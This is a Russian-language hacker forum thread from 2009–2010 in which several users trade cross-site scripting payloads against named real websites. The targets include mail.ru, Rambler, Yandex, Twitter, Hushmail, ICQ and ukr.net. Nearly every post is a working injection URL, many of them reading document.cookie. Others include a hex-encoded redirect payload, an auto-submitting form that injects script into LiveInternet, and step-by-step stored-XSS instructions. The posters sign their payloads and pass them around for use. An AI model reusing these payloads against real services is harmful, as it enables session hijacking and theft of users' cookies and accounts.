Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:


http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>

http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>

http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>

http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>

http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://foto.rambler.ru/introduce.htm...)%3C/script%3E

http://uptime.ru/downtime.php?host_id="><script>alert()</script>"

http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"

http://mail.yandex.ru/r?url=javascript:alert();

Ruslan1817
05.12.2009, 12:52
http://testoteka.ukr.net/searchresults/?target=%2522%253cscript%253ealert%28document.cook ie%29%253c%2Fscript%253e

http://search.ukr.net/yandex/search.php?search_mode=ordinal&geo=11000187&PerformSearch=1&search_query=\%27%3E%3C\%27\%27%3E\%22%3E%3Cscript %3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Ruslan1817
12.12.2009, 16:10
http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Ruslan1817
19.12.2009, 18:51
http://finance.search.ua/?area='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://tv.search.ua/?query=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%2 8document.cookie%29%3C%2Fscript%3E
http://tv.search.ua/?day='><''>"><script>alert(document.cookie)</script>

короче там все в XSS ))

http://r.mail.kz/wssx/helpinside.wssx?Language=russian'><''>"><script>alert(/Ruslan1817/)</script>

http://r.mail.kz/wssx/helpinside.wssx
уязвимые поля :
Ваше Имя Фамилия:
Ваш e-mail:



http://top.mail.tj/index.aspx?page=1&o=hits&l=50'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Ruslan1817
21.12.2009, 22:02
http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E

http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Ruslan1817
23.12.2009, 01:18
Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22

Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен

Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))

Ruslan1817
23.12.2009, 22:14
http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>

Ruslan1817
26.12.2009, 15:40
http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

Ruslan1817
26.12.2009, 23:24
http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

Ruslan1817
27.12.2009, 05:54
http://google.ftpsearch.com.ua/index.php?hl=uk&inlang=ru&ie=UTF-8&q=related:www.owasp.org/index.php/DOM_Based_XSS&ie=windows-1251&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mil-Net
28.12.2009, 13:27
Mail.ru

http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

Нашол сам недавно!
Пускаю по рукам :)

Mil-Net
28.12.2009, 16:07
Rambler.ru

http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E

brain[pillow]
28.12.2009, 17:49
Twitter - не почтовик, но надеюсь меня не побьют:

http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%23 39%3B)%3B%2F%2F

И клацаем справа на "Twet the results".

Mil-Net
28.12.2009, 18:24
Ну тогда я тоже выложу так как не нашол подходящей темы!
Магазин по продаже софта!

http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED +Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8

<Cyber-punk>
31.12.2009, 17:58
Почта? Почта!
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

Ruslan1817
03.01.2010, 06:50
https://mailserver1.hushmail.com/hushmail/index.php?PHPSESSID=A903042B9212494D8B8F3A7EFA99F9 60

Email Address:
вводим скрипт '><script>alert(/Ruslan1817/)</script>

vitaliy_n73
03.01.2010, 21:47
http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

vitaliy_n73
03.01.2010, 21:52
http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

vitaliy_n73
03.01.2010, 21:56
http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

W@r.N0i$e
09.01.2010, 13:16
Пассивная xss на mail.ru
https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

kl0yn
10.01.2010, 19:09
Пассивная xss на mail.ru
https://auht.mail.ru/cgi-bin/auth?page=&post=&login_from=&Lоgin=">< SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Повтор!

http://forum.antichat.ru/showpost.php?p=1645042&postcount=86

Ruslan1817
18.01.2010, 07:14
Не почта, но тоже оч забавный ресурс ))

http://naked.com/index.php?s=user.credits.buyCredit&freeRegister=1&freeRegister='%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Ruslan1817
13.02.2010, 15:09
http://11x11.mail.ru/tournaments/414252/act=join&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

работает тока у авторизированных ... а эт минус.

gringo60
17.02.2010, 20:17
Работает у авторизированных .

http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

mikail
17.02.2010, 20:20
http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E

gringo60
17.02.2010, 20:54
http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);

Ruslan1817
02.03.2010, 19:39
_http://direct.yandex.ru/registered/main.KJdxxnJWRSRj8t_8.pl?&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecmd=newCamp&mediaType=text&notnew=yes

Ruslan1817
06.03.2010, 23:40
http://maps.icq.com/maps/?country=RU&street=&city=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C/script%3E

Ruslan1817
27.03.2010, 16:01
http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest="><script>alert(/XSS/)</script>

Ruslan1817
19.04.2010, 08:48
http://do.ngs.ru/categories/services/poligr/sell/?&'><''>"><script>alert('Печенько хочет к маме')</script>

http://rabota.ngs.ru/resumes/search/?pageType=all&'><''>"><script>alert('Печенько хочет к маме')</script>

satana-fu
25.04.2010, 21:31
http://mail.am

http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


http://mirtesen.ru
http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&

Konqi
29.04.2010, 12:58
http://www.everyday.com

http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>

!!!SpartakFan!!!
06.05.2010, 02:45
http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>

Ruslan1817
06.05.2010, 10:57
http://en.securitylab.ru/nvd/index.php?'arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%'>"><script>alert(document.cookie)</script>

Ruslan1817
12.05.2010, 19:57
Может кому будет интересно
http://moscow.megafon.ru/buy/pay/pay/?city=985368&'metro=537480'>"><script>alert(document.cookie)</script>
http://search.twitter.com/search?q=cool+filter%3Alinks'>"><script>alert(document.cookie)</script>

M_script_
13.05.2010, 09:47
Может кому будет интересно
Очень даже интересно :)
Особенно в таком виде:
http://search.twitter.com/search?q=%66%69%6C%74%65%72%3A%6C%69%6E%6B%73%27%3 E%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65% 6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27http://google.com%27%3C%2F%73%63%72%69%70%74%3E

Ruslan1817
20.05.2010, 01:13
http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>

http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>

life_glider
23.05.2010, 18:16
liveinternet
<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');">
<input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' />
<input class="Hi" type="submit" value="Искать!" />
</form>
</body>

life_glider
24.05.2010, 16:24
http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

Ruslan1817
25.05.2010, 01:06
http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

BlackFan
11.06.2010, 18:35
http://maps.mail.ru

В строке поиска:
' onMouseOver='alert(1)'>
и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем
"><img src='.' onerror='alert()'>
И нажимаем "Добавить комментарий"